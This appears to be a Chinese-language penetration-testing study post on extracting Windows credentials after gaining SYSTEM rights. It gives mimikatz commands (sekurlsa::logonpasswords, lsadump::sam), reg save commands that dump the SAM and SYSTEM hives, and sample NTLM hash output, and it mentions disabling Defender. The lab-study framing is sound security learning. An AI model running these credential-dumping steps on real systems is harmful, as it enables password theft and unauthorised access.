Windows密码凭证获取学习(上)

简介: Windows密码凭证获取学习

1. 说明


本文参考了大量的第三方文档,参考资料如下,感谢各位师傅的帮助。

https://www.secrss.com/articles/24903
https://mp.weixin.qq.com/s/jW2tUXkiBaC6PiF-kRWb1Q
https://mp.weixin.qq.com/s/As4YZ8XDWCfBfieDUU30Ow
https://mp.weixin.qq.com/s/4nlyOIuyQZ9h0Bb5jQO4wQ
https://mp.weixin.qq.com/s/PDVs6zCuEsnpfzPIFI-XJw
https://mp.weixin.qq.com/s/-pijbPocXG8bSDU-l4i4RA
https://zhuanlan.zhihu.com/p/57800688
https://mp.weixin.qq.com/s/PDVs6zCuEsnpfzPIFI-XJw
https://xz.aliyun.com/t/10734#toc-2


2. Windows获取凭证或密码


一般来说,在我们获取到Windowssystem权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。

关于NTLM的知识,在这里就不在展开了,有兴趣的可以去搜下。


3. 环境准备


本次环境共准备了Windows server2003Windows7Windows10Windows server2012,按照他们的特点,有针对的进行实操获取。

本文默认已获取system权限的情况下进行操作。


4. 获取密码或hash方法


4.1 Mimikatz


这个神器肯定是大家都不陌生的, 以前我也写过关于这个工具的免杀学习文档。

原版工具:https://github.com/gentilkiwi/mimikatz

使用方法:

privilege::debug 
提升权限,返回Privilege '20' OK。说明权限提升成功
sekurlsa::logonpasswords
可以读取到NTLM哈希值


4.1.1 server2003


systeminfo查看当前的电脑是32位的,所以在这里就使用32位的来试下:


执行命令之后可以直接获取到明文:

privilege::debug 
sekurlsa::logonpasswords


4.1.2 windows10


在这里先关闭Windows10Windows defender,在这里并不对其进行免杀研究,直接使用x64位的之后,来获取hash

执行命令之后只能够获取hash,不能够直接获取明文:

209c6174da490caeb422f3fa5a7ae634

可以通过第三方的方式来获取密码:

当然,mimikatz也可以使用非交互的方式来获取hash

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"



4.2 注册表导出hash


有时候,因为某些问题,导致无法直接获取hash,所以在这里还可以使用注册表导出hash的方式来进行,具体的步骤如下:

在靶机上使用以下命令(需要system权限):

靶机上执行:
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
在本地使用mimikatz执行:
mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

4.2.1 server2003

打开cmd执行命令,导出system.hivsam.hivsecurity.hiv文件:

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

最后使用mimikatz执行,在非靶标机器上,不需要system权限:

mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

RID  : 000001f4 (500)
User : Administrator
  Hash LM  : f0d412bd764ffe81aad3b435b51404ee
  Hash NTLM: 209c6174da490caeb422f3fa5a7ae634

直接去查询即可。


4.2.2 Windows10


使用同样的方法导出之后再解密:

获取到hash信息:

User : admin
  Hash NTLM: 209c6174da490caeb422f3fa5a7ae634


4.3 pass64.exe


这个文件是我早些时候渗透的时候获得的,在win78等低于Windows10的系统上(这种说法不严谨),使用system权限运行能够直接获取64位系统的账号和密码信息。

这个工具应该是PwDump7工具的魔改版本。

win10上因为无法获取账号密码报错:

win7环境下:

相关文章
|
4月前
|
存储 C语言 C++
[笔记]windows逆向学习
[笔记]windows逆向学习
|
5天前
|
数据安全/隐私保护 Windows
windows密码获取 -- mimikatz
windows密码获取 -- mimikatz
5 0
|
3月前
|
安全 数据安全/隐私保护
windows10 查看已连接wifi的密码
windows10 查看已连接wifi的密码
118 0
|
25天前
|
机器人 Linux 数据安全/隐私保护
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
36 0
|
1月前
|
机器人 Linux 数据安全/隐私保护
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)(下)
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
37 0
|
1月前
|
Linux Python Windows
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)(上)
Python办公自动化【Windows中定时任务、OS/linux 系统定时任务 、Python 钉钉发送消息、Python 钉钉发送图片】(九)-全面详解(学习总结---从入门到深化)
26 0
|
2月前
|
SQL 关系型数据库 MySQL
Trinitycore学习之windows上用cmake生成vs项目并尝试在windows上启动服务
Trinitycore学习之windows上用cmake生成vs项目并尝试在windows上启动服务
32 0
|
2月前
|
NoSQL MongoDB 数据库
MongoDB【部署 03】Windows系统安装mongodb并设置用户名密码(无需安装mongosh)及SpringBoot集成报错 Command failed with error 18
MongoDB【部署 03】Windows系统安装mongodb并设置用户名密码(无需安装mongosh)及SpringBoot集成报错 Command failed with error 18
68 0
|
3月前
|
网络协议 安全 Linux
windows系统开发常用cmd命令学习
在 cmd 命令中,按键盘的向上箭头可以快速切换历史前后命令,敲 Tab 可自动补全路径
74 0
|
3月前
|
存储 Cloud Native Linux
CMake学习之windows下cmake生成nmake
CMake学习之windows下cmake生成nmake